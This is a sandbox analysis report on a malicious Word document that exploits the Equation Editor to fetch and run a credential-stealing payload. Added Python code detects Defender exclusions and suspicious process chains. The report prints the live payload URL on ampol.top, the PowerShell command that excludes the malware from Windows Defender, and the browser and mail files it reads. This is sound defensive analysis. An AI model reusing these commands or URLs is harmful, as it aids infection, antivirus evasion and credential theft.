            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeQueries volume information: C:\Users\user\AppData\Roaming\obie8920193.exe VolumeInformationJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
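The two behaviours recorded above, a binary running from %APPDATA% starting powershell.exe with Add-MpPreference -ExclusionPath for its own path, are what the overview's "Adds a directory exclusion to Windows Defender" and "Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet" signatures key on. The Python below is an added example, not part of the Joe Sandbox report and not code from Snake Keylogger: it takes process-creation records (parent image plus command line), decodes -EncodedCommand payloads so the cmdlet cannot hide behind base64, extracts every exclusion added, and rates a finding higher when the excluded path or the parent process lives in a user-writable directory. The first record repeats the command line from this report; the remaining records, the base64 variant and the directory list, are constructed inputs.

```python
import base64
import re
from typing import List, Optional

# powershell.exe accepts any prefix of -EncodedCommand down to -e, and also -ec.
_ENC_FLAGS = sorted({"encodedcommand"[:i] for i in range(1, 15)} | {"ec"}, key=len, reverse=True)
ENCODED_RE = re.compile(r"(?:^|\s)-(?:" + "|".join(_ENC_FLAGS) + r")\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
MP_CMDLET_RE = re.compile(r"\b(?:add|set)-mppreference\b", re.IGNORECASE)
# One exclusion value: "quoted", 'quoted' or bare; the cmdlet takes comma-separated lists.
_TOKEN = r'''"[^"]*"|'[^']*'|[^\s,"']+'''
EXCLUSION_RE = re.compile(
    r"-Exclusion(Path|Process|Extension)\s+((?:" + _TOKEN + r")(?:\s*,\s*(?:" + _TOKEN + r"))*)",
    re.IGNORECASE,
)
# Locations a standard user can write to (constructed list): an exclusion here shields a drop site.
USER_WRITABLE_RE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\(?:appdata|downloads|desktop|documents)\\"
    r"|^[a-z]:\\(?:windows\\temp|users\\public)\\",
    re.IGNORECASE,
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script behind -EncodedCommand (or an accepted abbreviation), else None."""
    m = ENCODED_RE.search(cmdline)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_exclusions(script: str) -> List[dict]:
    """One dict per exclusion value that an Add-/Set-MpPreference call in `script` adds."""
    if not MP_CMDLET_RE.search(script):
        return []
    found = []
    for m in EXCLUSION_RE.finditer(script):
        kind = m.group(1).lower()
        for raw in re.findall(_TOKEN, m.group(2)):
            value = raw.strip("\"'")
            found.append({"kind": kind, "value": value,
                          "user_writable": kind == "path" and bool(USER_WRITABLE_RE.match(value))})
    return found


def scan(events: List[dict]) -> List[dict]:
    """Apply the checks to records of the form {"parent": image path, "cmdline": command line}."""
    findings = []
    for ev in events:
        decoded = decode_encoded_command(ev["cmdline"])
        parent_in_user_dir = bool(USER_WRITABLE_RE.match(ev["parent"]))
        for f in find_exclusions(decoded if decoded is not None else ev["cmdline"]):
            f.update(parent=ev["parent"], encoded=decoded is not None)
            f["severity"] = "high" if (f["user_writable"] or f["encoded"] or parent_in_user_dir) else "review"
            findings.append(f)
    return findings


# Constructed script for the base64 case: the same cmdlet pointed at a Downloads path.
_HIDDEN = 'Add-MpPreference -ExclusionPath "C:\\Users\\user\\Downloads\\update.exe"'
SAMPLE_EVENTS = [
    # As recorded in this report: the dropped binary excludes itself from Defender.
    {"parent": r"C:\Users\user\AppData\Roaming\obie8920193.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe"'},
    # Constructed: the cmdlet wrapped in -enc, the case the base64 Sigma rule targets.
    {"parent": r"C:\Users\user\AppData\Roaming\obie8920193.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + base64.b64encode(_HIDDEN.encode("utf-16-le")).decode()},
    # Constructed: an administrator excluding a vendor agent from an interactive shell.
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell.exe Add-MpPreference -ExclusionPath "C:\Program Files\Vendor\agent.exe","C:\Program Files\Vendor\cache"'},
    # Constructed: unrelated PowerShell use; must produce no finding.
    {"parent": r"C:\Windows\explorer.exe", "cmdline": "powershell.exe -ExecutionPolicy Bypass Get-Process"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["severity"], f["kind"], f["value"], "encoded" if f["encoded"] else "plain", "parent:", f["parent"])
```

Run against Sysmon event 1 or Security event 4688 data, the same logic flags this sample's exclusion as high on two independent grounds (the path and the parent are both under the user's profile), while an administrator's Program Files exclusion is only queued for review.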

            Stealing of Sensitive Information

Source: Yara match | File source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.864677424.00000000023DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.864677424.0000000002231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: obie8920193.exe PID: 3152, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: obie8920193.exe PID: 3244, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\obie8920193.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\obie8920193.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: Yara match | File source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: obie8920193.exe PID: 3152, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: obie8920193.exe PID: 3244, type: MEMORYSTR

            Remote Access Functionality

Source: Yara match | File source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.864677424.00000000023DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.864677424.0000000002231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: obie8920193.exe PID: 3152, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: obie8920193.exe PID: 3244, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic column; a leading number is the signature count shown in that matrix cell, techniques without a number are the matrix's placeholder entries and were not observed)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 33 Exploitation for Client Execution; 1 Command and Scripting Interpreter; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 DLL Side-Loading; 111 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Install Root Certificate; 12 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 1 Modify Registry; 31 Virtualization/Sandbox Evasion; 111 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 1 File and Directory Discovery; 13 System Information Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 2 Ingress Tool Transfer; 11 Encrypted Channel; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph (ID 1465556, sample Bank Slip 2.doc, start date 01/07/2024, architecture WINDOWS, score 100). In the graph's legend the numbers after a process name are the number of created files and the number of created registry values.

Root signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 14 other signatures

WINWORD.EXE (291 files, 18 registry values) started
  EQNEDT32.EXE (11 files) started
    Network: ampol.top 104.21.53.203, port 443, local port 49163, CLOUDFLARENETUS, United States
    Dropped: C:\Users\user\AppData\...\obie8920193.exe (PE32); C:\Users\user\...\FcdBUj68lnCbMtB[1].exe (PE32)
    Signatures: Installs new ROOT certificates; Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    obie8920193.exe (1 file, 8 registry values) started
      Signatures: Machine Learning detection for dropped file; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
      obie8920193.exe (12 files, 2 registry values) started
        Network: reallyfreegeoip.org 188.114.96.3, port 443, local ports 49165 and 49166, CLOUDFLARENETUS, European Union; 4 other IPs or domains
        Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Tries to detect the country of the analysis system (by using the IP)
      powershell.exe (4 files) started
        Signatures: Installs new ROOT certificates
  EQNEDT32.EXE (second instance) started
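Read as a detection problem, the graph above has one awkward property: WINWORD.EXE never starts the dropper itself, the chain runs through EQNEDT32.EXE, and on a live Windows host the Equation Editor is a COM server started by the DCOM launcher (svchost.exe -k DcomLaunch) rather than by Word. A rule that only inspects Office's direct children therefore misses the whole chain, which is why the overview lists separate Equation Editor signatures. The Python below is an added example, not from the Joe Sandbox report or from the Sigma rules it cites: it rebuilds a process tree from process-creation records, walks each process's ancestry, and flags any child of EQNEDT32.EXE, any binary under a user profile directory beneath a document handler, and PowerShell beneath a document handler, while the plain Office-child check stays silent on this tree. The records are constructed to mirror this report: PIDs 1804, 3152 and 3244 are the ones the report gives, and the remaining PIDs, the WINWORD.EXE path, the svchost parent and the allowlist are assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, Iterable, Iterator, List, Tuple

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Equation Editor is a document handler in its own right: its real parent is
# svchost.exe -k DcomLaunch, not WINWORD.EXE, so it needs an explicit rule.
DOCUMENT_HANDLERS = OFFICE_APPS | {"eqnedt32.exe"}
# Children Office starts legitimately (constructed allowlist; tune per estate).
OFFICE_CHILD_ALLOWLIST = {"splwow64.exe", "winword.exe", "excel.exe", "outlook.exe"}
USER_PROFILE_RE = re.compile(r"^[a-z]:\\users\\[^\\]+\\", re.IGNORECASE)

Event = Tuple[int, int, str, str]  # (pid, ppid, image path, command line)


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str
    children: List["Proc"] = field(default_factory=list)

    @property
    def name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


def build_tree(events: Iterable[Event]) -> Dict[int, Proc]:
    """Index processes by PID and link each one to its parent when the parent is known."""
    procs = {pid: Proc(pid, ppid, image, cmdline) for pid, ppid, image, cmdline in events}
    for p in procs.values():
        if p.ppid in procs:
            procs[p.ppid].children.append(p)
    return procs


def ancestors(procs: Dict[int, Proc], p: Proc) -> Iterator[Proc]:
    """Walk parent links upwards; stops at the root or on a PID cycle (recycled PIDs)."""
    seen = {p.pid}
    while p.ppid in procs and p.ppid not in seen:
        p = procs[p.ppid]
        seen.add(p.pid)
        yield p


def _finding(rule: str, p: Proc, via: Proc) -> dict:
    return {"rule": rule, "pid": p.pid, "image": p.image, "via": f"{via.name} (pid {via.pid})"}


def analyze(events: Iterable[Event]) -> List[dict]:
    """Apply the four checks to every process; ancestry, not just the parent, decides three of them."""
    procs = build_tree(events)
    findings = []
    for p in procs.values():
        parent = procs.get(p.ppid)
        handler = next((a for a in ancestors(procs, p) if a.name in DOCUMENT_HANDLERS), None)
        if parent and parent.name in OFFICE_APPS and p.name not in OFFICE_CHILD_ALLOWLIST:
            findings.append(_finding("office_child_process", p, parent))
        if parent and parent.name == "eqnedt32.exe":
            findings.append(_finding("equation_editor_spawned_process", p, parent))
        if handler and USER_PROFILE_RE.match(p.image):
            findings.append(_finding("user_directory_binary_under_document_handler", p, handler))
        if handler and p.name == "powershell.exe":
            findings.append(_finding("powershell_under_document_handler", p, handler))
    return findings


# Constructed records mirroring this report's tree; PIDs other than 1804/3152/3244 are assumed.
SAMPLE_EVENTS: List[Event] = [
    (600, 4, r"C:\Windows\System32\services.exe", "services.exe"),
    (700, 600, r"C:\Windows\System32\svchost.exe", "svchost.exe -k DcomLaunch"),
    (1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    (2000, 1000, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE", '"WINWORD.EXE" "Bank Slip 2.doc"'),
    (1804, 700, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE", '"EQNEDT32.EXE" -Embedding'),
    (3152, 1804, r"C:\Users\user\AppData\Roaming\obie8920193.exe", r'"C:\Users\user\AppData\Roaming\obie8920193.exe"'),
    (3244, 3152, r"C:\Users\user\AppData\Roaming\obie8920193.exe", r'"C:\Users\user\AppData\Roaming\obie8920193.exe"'),
    (3300, 3152, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe"'),
    (4000, 1000, r"C:\Windows\System32\notepad.exe", "notepad.exe"),  # benign sibling of WINWORD
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["rule"], "pid", f["pid"], f["image"], "via", f["via"])
```

The ancestry walk is what makes the second obie8920193.exe instance (the injected child, PID 3244) and the PowerShell exclusion attributable to the Equation Editor even though neither is its direct child; a parent-only rule would see them as children of an unremarkable user binary.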

Source | Detection | Scanner | Label
Bank Slip 2.doc | 39% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\obie8920193.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\FcdBUj68lnCbMtB[1].exe | 100% | Joe Sandbox ML

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
(The trailing "0", "03", "0D" and similar characters on the certificate-related URLs are carved from X.509 CRL and OCSP fields in memory and are not part of the URLs.)
http://crl.entrust.net/server1.crl0 | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://secure.comodo.com/CPS0 | 0% | URL Reputation | safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | URL Reputation | safe
http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe
http://reallyfreegeoip.org | 0% | Avira URL Cloud | safe
https://reallyfreegeoip.org | 0% | Avira URL Cloud | safe
http://checkip.dyndns.org/q | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | Avira URL Cloud | safe
https://ampol.top/FcdBUj68lnCbMtB.exe | 100% | Avira URL Cloud | malware
https://ampol.top/FcdBUj68lnCbMtB.exej | 100% | Avira URL Cloud | malware
https://ampol.top/ | 100% | Avira URL Cloud | malware
https://ampol.top/FcdBUj68lnCbMtB.exettC: | 100% | Avira URL Cloud | malware
http://checkip.dyndns.org/ | 0% | Avira URL Cloud | safe
http://checkip.dyndns.org | 0% | Avira URL Cloud | safe
https://reallyfreegeoip.org/xml/8.46.123.33 | 0% | Avira URL Cloud | safe
http://checkip.dyndns.com | 0% | Avira URL Cloud | safe
https://reallyfreegeoip.org/xml/8.46.123.334 | 0% | Avira URL Cloud | safe
https://reallyfreegeoip.org/xml/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ampol.top | 104.21.53.203 | true | true | - | unknown
reallyfreegeoip.org | 188.114.96.3 | true | true | - | unknown
checkip.dyndns.com | 158.101.44.242 | true | false | - | unknown
checkip.dyndns.org | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org/ | false | Avira URL Cloud: safe | unknown
https://ampol.top/FcdBUj68lnCbMtB.exe | true | Avira URL Cloud: malware | unknown
https://reallyfreegeoip.org/xml/8.46.123.33 | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ampol.top/ | EQNEDT32.EXE, 00000002.00000002.354581271.00000000005FF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ampol.top/FcdBUj68lnCbMtB.exej | EQNEDT32.EXE, 00000002.00000002.354581271.00000000005BF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/server1.crl0 | EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ocsp.entrust.net03 | EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://checkip.dyndns.org/q | obie8920193.exe, 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ampol.top/FcdBUj68lnCbMtB.exettC: | EQNEDT32.EXE, 00000002.00000002.354581271.00000000005BF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://reallyfreegeoip.org | obie8920193.exe, 00000007.00000002.864677424.0000000002367000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002392000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002385000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002374000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000022EC000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023C0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org | obie8920193.exe, 00000007.00000002.864677424.0000000002367000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002392000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000022D4000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002385000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002374000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023C0000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002317000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://checkip.dyndns.org | obie8920193.exe, 00000007.00000002.864677424.00000000022C5000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002367000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002392000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000022D4000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002385000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002374000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023C0000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023A0000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002317000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.com | obie8920193.exe, 00000007.00000002.864677424.0000000002367000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002392000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000022D4000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002385000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002374000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023C0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net0D | EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.334 | obie8920193.exe, 00000007.00000002.864677424.0000000002367000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002392000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002385000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002374000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023C0000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002317000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | obie8920193.exe, 00000005.00000002.366421408.0000000002571000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002231000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://secure.comodo.com/CPS0 | EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | EQNEDT32.EXE, 00000002.00000002.354913231.0000000004379000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.354581271.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe.2.dr, FcdBUj68lnCbMtB[1].exe.2.dr | false | URL Reputation: safe | unknown
http://crl.entrust.net/2048ca.crl0 | EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
